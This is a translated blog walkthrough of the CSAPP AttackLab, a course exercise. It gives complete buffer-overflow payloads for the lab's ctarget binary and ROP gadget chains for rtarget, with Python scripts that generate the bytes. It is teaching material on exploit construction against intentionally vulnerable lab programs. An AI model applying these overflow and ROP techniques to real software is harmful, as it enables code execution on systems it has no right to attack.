CSAPP AttackLab

Article link: https://blog.csdn.net/qq_40955029/article/details/121916406

Lab Overview

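The lab provides two executables, ctarget and rtarget, and is divided into five levels. Each level requires constructing a buffer overflow attack in a particular way.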

The lab provides the following programs:

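ctarget and rtarget are the executables to attack.
- The -q option keeps the program from sending data to the server.
- The -i FILE option reads input from FILE instead of the terminal.
- To debug with gdb, run gdb --args ctarget -q -i FILE.
hex2raw converts the hexadecimal text form of bytes into the raw bytes themselves. For example, the byte 0x01 cannot be typed on a keyboard, so you write it as hex text, let hex2raw write the raw bytes to a file, and feed that file to ctarget. The command below builds exploit-raw.txt from exploit.txt. Note that the hex values in exploit.txt are separated by spaces and the file ends with a newline.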

./hex2raw < exploit.txt > exploit-raw.txt
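
To make the conversion concrete, here is a rough Python sketch of what the command above does. It is not the real hex2raw implementation; the function name `hex_to_raw` is made up for illustration, and the handling of C-style block comments is an assumption about the tool's behavior.

```python
import re

def hex_to_raw(text: str) -> bytes:
    """Convert whitespace-separated two-digit hex values into raw bytes."""
    # Assumption: block comments are ignored, so strip them before parsing.
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.DOTALL)
    # Each remaining token is one byte written as two hex digits.
    return bytes(int(token, 16) for token in text.split())

raw = hex_to_raw("/* touch1 */ c0 17 40 00 00 00 00 00\n")
print(raw)
```

The result can be written to a file in binary mode and passed to ctarget with -i, in the same way as the output of hex2raw.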

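You can also write assembly code and run gcc -c followed by objdump -d to assemble and then disassemble it, which gives the byte encoding of the instructions.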

Level 1

When getbuf finishes, it must not return to test but jump to touch1 instead.

void test()
{
  int val;
  val = getbuf();
  printf("No exploit. Getbuf returned 0x%x\n", val);
}

void touch1()
{
  vlevel = 1; /* Part of validation protocol */
  printf("Touch1!: You called touch1()\n");
  validate(1);
  exit(0);
}

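The disassembly shows that getbuf allocates 40 bytes of stack space, so the return address sits directly above the buffer. Entering 40 bytes of padding followed by the address of touch1, byte by byte, overwrites it.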

0000000000401968 <test>:
  ...
  401971:	e8 32 fe ff ff       	callq  4017a8 <getbuf>
  401976:	89 c2                	mov    %eax,%edx
  ...

00000000004017a8 <getbuf>:
  4017a8:	48 83 ec 28          	sub    $0x28,%rsp  // allocates 0x28 (40) bytes
  4017ac:	48 89 e7             	mov    %rsp,%rdi
  4017af:	e8 8c 02 00 00       	callq  401a40 <Gets>
  4017b4:	b8 01 00 00 00       	mov    $0x1,%eax
  4017b9:	48 83 c4 28          	add    $0x28,%rsp
  4017bd:	c3                   	retq
  4017be:	90                   	nop
  4017bf:	90                   	nop

00000000004017c0 <touch1>:
  ...
  ...

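touch1 is at 0x4017c0, so we only need to overwrite the return address with that value. Checking the byte order in gdb shows that the machine is little-endian, so the address is written least significant byte first.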

So the input is any 40 bytes followed by the address of touch1:

/* 40 bytes of padding */
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
/* entry address of touch1 */
c0 17 40 00 00 00 00 00
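
The same byte string can be generated instead of typed by hand. The following is a minimal sketch, assuming the buffer size and touch1 address from the disassembly above; the variable names are illustrative only.

```python
import struct

BUF_SIZE = 0x28      # from `sub $0x28,%rsp` in getbuf
TOUCH1 = 0x4017c0    # address of touch1 in this build of ctarget

# 40 bytes of padding, then the 8-byte return address in little-endian order.
payload = b"\x00" * BUF_SIZE + struct.pack("<Q", TOUCH1)

# Print in the hex text form that hex2raw expects.
print(" ".join(f"{b:02x}" for b in payload))
```

`struct.pack("<Q", ...)` takes care of the little-endian layout, which is the easiest detail to get wrong when writing the address manually.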

Level 2

The goal is to make getbuf return into touch2:

void touch2(unsigned val)
{
  vlevel = 2; /* Part of validation protocol */
  if (val == cookie) {
    printf("Touch2!: You called touch2(0x%.8x)\n", val);
    validate(2);
  } else {
    printf("Misfire: You called touch2(0x%.8x)\n", val);
    fail(2);
  }
  exit(0);
}

touch2 takes its argument in %edi, so we have to inject a piece of code, called mycode here. getbuf returns into mycode, mycode sets %edi, and then returns into touch2.

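Printing the value of %rsp in gdb shows:

0x5561dc78 ~ 0x5561dca0 holds the first 40 bytes of our input.
0x5561dca0 ~ 0x5561dca8 holds the return address of getbuf.
Once control reaches the injected mycode, it can push the address of touch2 onto the stack, so that the retq at the end of mycode returns into touch2.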

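So the entry address of mycode is 0x5561dc78, where our injected code begins, and the return address stored at 0x5561dca0 must be set to that entry address. The injected code is simple: set %edi to our cookie, then push the address of touch2 as the return address: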

0000000000000000 <.text>:
   0:	bf fa 97 b9 59       	mov    $0x59b997fa,%edi
   5:	68 ec 17 40 00       	pushq  $0x4017ec
   a:	c3                   	retq

So the input is:

/* mycode */
bf fa 97 b9 59 68 ec 17 40 00 c3
/* 29 bytes of padding */
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
/* entry address of mycode */
78 dc 61 55 00 00 00 00
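
The padding length and the overwritten return address follow from simple arithmetic, which this sketch spells out. It assumes the buffer address 0x5561dc78 observed in gdb above and reuses the 11 code bytes from the disassembly; the names are illustrative.

```python
import struct

BUF_START = 0x5561dc78   # start of the buffer, as observed in gdb
BUF_SIZE = 0x28          # 40 bytes reserved by getbuf

# mov $0x59b997fa,%edi ; pushq $0x4017ec ; retq
code = bytes.fromhex("bf fa 97 b9 59 68 ec 17 40 00 c3")

padding = BUF_SIZE - len(code)            # bytes left to fill the buffer
ret_slot = BUF_START + BUF_SIZE           # where getbuf's return address lives

payload = code + b"\x00" * padding + struct.pack("<Q", BUF_START)
print(padding, hex(ret_slot))
print(" ".join(f"{b:02x}" for b in payload))
```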

Level 3

The goal is to reach touch3, but this time the argument is the address of a string whose content is the hexadecimal text form of the cookie.

void touch3(char *sval)
{
  vlevel = 3; /* Part of validation protocol */
  if (hexmatch(cookie, sval)) {
    printf("Touch3!: You called touch3(\"%s\")\n", sval);
    validate(3);
  } else {
    printf("Misfire: You called touch3(\"%s\")\n", sval);
    fail(3);
  }
  exit(0);
}

/* Compare string to hex represention of unsigned value */
int hexmatch(unsigned val, char *sval)
{
  char cbuf[110];
  /* Make position of check string unpredictable */
  char *s = cbuf + random() % 100;
  sprintf(s, "%.8x", val);
  return strncmp(sval, s, 9) == 0;
}
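
To see what string touch3 accepts, the comparison in hexmatch can be modeled in a few lines. This is only a sketch of the check, not the lab's code: the random placement inside cbuf is left out because it does not affect the result, and the Python function name mirrors the C one purely for readability.

```python
def hexmatch(val: int, sval: bytes) -> bool:
    """Model of the C check: strncmp(sval, s, 9) == 0 with s = sprintf("%.8x", val)."""
    # sprintf writes 8 lowercase hex digits plus a terminating NUL byte.
    s = f"{val:08x}".encode("ascii") + b"\x00"
    # Comparing 9 bytes means the 8 digits AND the NUL terminator must match.
    return sval[:9] == s

print(hexmatch(0x59b997fa, b"59b997fa\x00"))
```

Because nine bytes are compared, the string in the exploit has to end with a 00 byte right after the eight hex digits.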

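The string has to be stored above %rsp, because once touch3 is called, the memory below %rsp is overwritten by touch3 and hexmatch. The string therefore starts at 0x5561dca8, just past the slot that holds getbuf's return address.
mycode still starts at 0x5561dc78. It loads the address of the string into %edi, pushes the address of touch3, and returns.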

mycode is:

0000000000000000 <.text>:
   0:	bf a8 dc 61 55       	mov    $0x5561dca8,%edi
   5:	68 fa 18 40 00       	pushq  $0x4018fa
   a:	c3                   	retq

So the input is:

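/* mycode */
bf a8 dc 61 55 68 fa 18 40 00 c3
/* the remaining 29 bytes of padding */
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
/* entry address of mycode (overwrites getbuf's return address) */
78 dc 61 55 00 00 00 00
/* the cookie as a string, terminated by '\0' */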
35 39 62 39 39 37 66 61 00
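
The whole Level 3 input can be derived from four numbers. The sketch below assumes the addresses and cookie used in this write-up and assembles the three instructions by hand from the opcodes visible in the disassembly (bf, 68, c3); variable names are illustrative.

```python
import struct

BUF_START = 0x5561dc78   # start of the buffer, as observed in gdb
BUF_SIZE = 0x28
TOUCH3 = 0x4018fa
COOKIE = 0x59b997fa

# The string goes right above the 8-byte return address slot.
str_addr = BUF_START + BUF_SIZE + 8

# mov $str_addr,%edi ; pushq $TOUCH3 ; retq
code = b"\xbf" + struct.pack("<I", str_addr) + b"\x68" + struct.pack("<I", TOUCH3) + b"\xc3"

# ASCII hex digits of the cookie followed by the NUL terminator.
cookie_str = f"{COOKIE:08x}".encode("ascii") + b"\x00"

payload = code.ljust(BUF_SIZE, b"\x00") + struct.pack("<Q", BUF_START) + cookie_str
print(hex(str_addr))
print(" ".join(f"{b:02x}" for b in payload))
```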

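The next two levels attack rtarget. rtarget uses two defenses, stack randomization and restricting which memory regions are executable, so injected code no longer works and the attack has to be built with ROP (return-oriented programming).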

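rtarget provides a gadget farm. To execute gadget1 and then gadget2, write 40 bytes of padding followed by the address of gadget1 and then the address of gadget2.

When getbuf executes retq, the stack pointer points at the address of gadget1, so control returns into gadget1 and the stack pointer moves up to the address of gadget2.
When gadget1 executes retq, control returns exactly to the entry of gadget2.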
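
The chaining described above can be illustrated with a toy model in which every retq pops the next 8-byte word from the stack and jumps to it. The addresses 0x1000 and 0x2000 and the function name `run_chain` are hypothetical and exist only for this illustration.

```python
def run_chain(stack_words, gadgets):
    """Follow a chain of return addresses; each `retq` pops the next word."""
    trace = []
    sp = 0                          # index of the word %rsp points at
    while sp < len(stack_words):
        target = stack_words[sp]    # retq loads the word at %rsp ...
        sp += 1                     # ... and moves %rsp up by 8 bytes
        if target not in gadgets:   # not a known gadget: stop the model
            break
        trace.append(gadgets[target])
    return trace

# Hypothetical addresses, used only to show the order of execution.
gadgets = {0x1000: "gadget1", 0x2000: "gadget2"}
trace = run_chain([0x1000, 0x2000, 0xdead], gadgets)
print(trace)
```

The model ignores what each gadget does and only shows why placing the addresses back to back on the stack runs them in order.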

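The appendix of the lab handout lists the encodings of various instructions; look them up when building gadgets. The most important ones are the single-byte nop (90), the two-byte nops (...), and retq (c3).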

Level 4

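This level calls touch2 using ROP. The idea is to run a few gadgets so that %rdi = cookie and then return into touch2. To get the cookie into a register, place it on the stack in advance and pop it into a register with popq. Then mov that value into %rdi and return; the next return address on the stack sends control to touch2.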

Part of the gadget farm:

000000000040199a <getval_142>:
  40199a:	b8 fb 78 90 90       	mov    $0x909078fb,%eax
  40199f:	c3                   	retq   

00000000004019a0 <addval_273>:
  4019a0:	8d 87 48 89 c7 c3    	lea    -0x3c3876b8(%rdi),%eax
  4019a6:	c3                   	retq   

00000000004019a7 <addval_219>:
  4019a7:	8d 87 51 73 58 90    	lea    -0x6fa78caf(%rdi),%eax
  4019ad:	c3                   	retq   

00000000004019ae <setval_237>:
  4019ae:	c7 07 48 89 c7 c7    	movl   $0xc7c78948,(%rdi)
  4019b4:	c3                   	retq   

00000000004019b5 <setval_424>:
  4019b5:	c7 07 54 c2 58 92    	movl   $0x9258c254,(%rdi)
  4019bb:	c3                   	retq   

00000000004019bc <setval_470>:
  4019bc:	c7 07 63 48 8d c7    	movl   $0xc78d4863,(%rdi)
  4019c2:	c3                   	retq   

00000000004019c3 <setval_426>:
  4019c3:	c7 07 48 89 c7 90    	movl   $0x90c78948,(%rdi)
  4019c9:	c3                   	retq   

00000000004019ca <getval_280>:
  4019ca:	b8 29 58 90 c3       	mov    $0xc3905829,%eax
  4019cf:	c3                   	retq   

// the remaining part is only needed for Level 5 and is not listed

[Figure: partial instruction encoding table from the lab handout]

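Checking against the encoding table, the byte 58 in addval_219 is the encoding of popq %rax, and it is followed by 90 (nop) and then c3 (retq). That covers the first step, popping the cookie off the stack, so this is gadget1, at 0x4019ab.
Next we need movq %rax,%rdi, encoded as 48 89 c7. setval_426 contains exactly these bytes followed by 90 and c3, so this is gadget2, at 0x4019c5. Note that setval_237 contains the same three bytes, but they are followed by c7 rather than the nop byte 90, so it cannot be used.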
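
Finding a gadget address is a byte search inside a function's encoding. The sketch below uses the bytes of three farm functions as listed above (including each trailing c3); the helper name `find_gadget` is made up for illustration.

```python
def find_gadget(func_addr, func_hex, pattern_hex):
    """Return the address where the byte pattern starts, or None if absent."""
    code = bytes.fromhex(func_hex)
    offset = code.find(bytes.fromhex(pattern_hex))
    return None if offset < 0 else func_addr + offset

# popq %rax ; nop ; retq  inside addval_219
g1 = find_gadget(0x4019a7, "8d 87 51 73 58 90 c3", "58 90 c3")
# movq %rax,%rdi ; nop ; retq  inside setval_426
g2 = find_gadget(0x4019c3, "c7 07 48 89 c7 90 c3", "48 89 c7 90 c3")
# setval_237 has 48 89 c7, but c7 follows instead of nop, so no match
g3 = find_gadget(0x4019ae, "c7 07 48 89 c7 c7 c3", "48 89 c7 90 c3")

print(hex(g1), hex(g2), g3)
```

Including the trailing nop and retq bytes in the search pattern is what rules out setval_237.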

The resulting control flow is:

gadget1:
    popq %rax
gadget2:
    movq %rax,%rdi
touch2:
    ...

So the input is:

/* 40 bytes of padding */
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

/* entry of gadget1 */
ab 19 40 00 00 00 00 00

/* the cookie, popped off the stack by gadget1 */
fa 97 b9 59 00 00 00 00

/* entry of gadget2 */
c5 19 40 00 00 00 00 00

/* entry of touch2 */
ec 17 40 00 00 00 00 00
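
Since every element of the chain is one 8-byte little-endian word, the input can be produced from a plain list. This is a minimal sketch using the addresses and cookie from this write-up; the constant names are illustrative.

```python
import struct

BUF_SIZE = 0x28
POP_RAX = 0x4019ab        # gadget1: popq %rax ; nop ; retq
MOV_RAX_RDI = 0x4019c5    # gadget2: movq %rax,%rdi ; nop ; retq
TOUCH2 = 0x4017ec
COOKIE = 0x59b997fa

# Order on the stack: gadget1, the value it pops, gadget2, touch2.
chain = [POP_RAX, COOKIE, MOV_RAX_RDI, TOUCH2]

payload = b"\x00" * BUF_SIZE + b"".join(struct.pack("<Q", w) for w in chain)
print(" ".join(f"{b:02x}" for b in payload))
```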

Level 5

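This level calls touch3 using ROP. The main difficulty is that the value of %rsp has to be passed into %rdi, yet we cannot wait until %rsp reaches the string and then copy %rsp into %rdi. If %rsp pointed at the start of the string when some gadget executed retq, the location %rsp points to would be taken as that gadget's return address. The return address would then be the bytes of our string, and control could not return to the place we want.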

Suppose our stack looks like this:

---mystring
---address of gadgetn
   ...
---address of gadget2
---address of gadget1

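Then we can copy the value of %rsp at gadget1 into %rdi and follow it with an addition, %rdi = %rdi + (8 * n). Here 8 * n is a concrete number that is already known when the input is built, and choosing the right n makes %rdi point at the start of our string.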

The lab handout slyly leaves out the encoding of the add instruction, but the farm turns out to contain a function add_xy:

00000000004019d6 <add_xy>:
  4019d6:	48 8d 04 37          	lea    (%rdi,%rsi,1),%rax
  4019da:	c3                   	retq

We can use this complete function to do the addition, so there is no need to piece together an add instruction ourselves.

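The farm does not contain an exact encoding for every move we need, so some steps go through intermediate registers (for example, a value cannot be popped straight into %rdi; it has to be popped into %rax first and then moved to %rdi). When searching the farm, also make sure the encoding is followed immediately by retq (c3), or by single-byte or two-byte nops and then retq. One workable sequence is: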

gadget1:
    popq %rax          //58        //<addval_219>
gadget2:
    movl %eax, %edx    //89 c2     //<getval_481>
gadget3:
    movl %edx, %ecx    //89 d1     //<getval_311>
gadget4:    
    movl %ecx, %esi    //89 ce     //<addval_436>
gadget5:
    movq %rsp, %rax    //48 89 e0  //<addval_190>
gadget6:
    movq %rax, %rdi    //48 89 c7  //<setval_426>
gadget7:
    <add_xy>           //...       //<add_xy>
gadget8:
    movq %rax, %rdi    //48 89 c7  //<setval_426>
touch3:
    ...

The input is:

/* 40 bytes of padding */
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

/* gadget1: popq %rax <addval_219> */
ab 19 40 00 00 00 00 00

/* value to pop: offset from the saved %rsp to the string = 4 * 8 = 32 = 0x20 */
20 00 00 00 00 00 00 00

/* gadget2: movl %eax, %edx <getval_481> */
dd 19 40 00 00 00 00 00

/* gadget3: movl %edx, %ecx <getval_311> */
69 1a 40 00 00 00 00 00

/* gadget4: movl %ecx, %esi <addval_436> */
13 1a 40 00 00 00 00 00

/* gadget5: movq %rsp, %rax <addval_190> */
06 1a 40 00 00 00 00 00

/* gadget6: movq %rax, %rdi <setval_426> */
c5 19 40 00 00 00 00 00

/* gadget7: lea (%rdi,%rsi,1),%rax <add_xy> */
d6 19 40 00 00 00 00 00

/* gadget8: movq %rax, %rdi <setval_426> */
c5 19 40 00 00 00 00 00

/* touch3 */
fa 18 40 00 00 00 00 00

/* the cookie string */
35 39 62 39 39 37 66 61 00
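
The offset 0x20 does not have to be counted by hand: it is 8 bytes for every word that lies between the position %rsp has when gadget5 runs and the string. The sketch below derives it from the chain layout, assuming the gadget addresses listed above; the constant names are illustrative.

```python
import struct

BUF_SIZE = 0x28
POP_RAX = 0x4019ab        # popq %rax
MOVL_EAX_EDX = 0x4019dd   # movl %eax,%edx
MOVL_EDX_ECX = 0x401a69   # movl %edx,%ecx
MOVL_ECX_ESI = 0x401a13   # movl %ecx,%esi
MOVQ_RSP_RAX = 0x401a06   # movq %rsp,%rax
MOVQ_RAX_RDI = 0x4019c5   # movq %rax,%rdi
ADD_XY = 0x4019d6         # lea (%rdi,%rsi,1),%rax
TOUCH3 = 0x4018fa
COOKIE = 0x59b997fa

# When movq %rsp,%rax runs, %rsp already points at the word after its own
# address, so these are the words between the saved %rsp and the string.
tail = [MOVQ_RAX_RDI, ADD_XY, MOVQ_RAX_RDI, TOUCH3]
offset = 8 * len(tail)

chain = [POP_RAX, offset, MOVL_EAX_EDX, MOVL_EDX_ECX, MOVL_ECX_ESI, MOVQ_RSP_RAX] + tail
cookie_str = f"{COOKIE:08x}".encode("ascii") + b"\x00"

payload = b"\x00" * BUF_SIZE + b"".join(struct.pack("<Q", w) for w in chain) + cookie_str
print(hex(offset), len(payload))
```

If a gadget is added to or removed from `tail`, the offset adjusts automatically, which avoids the most common mistake in this level.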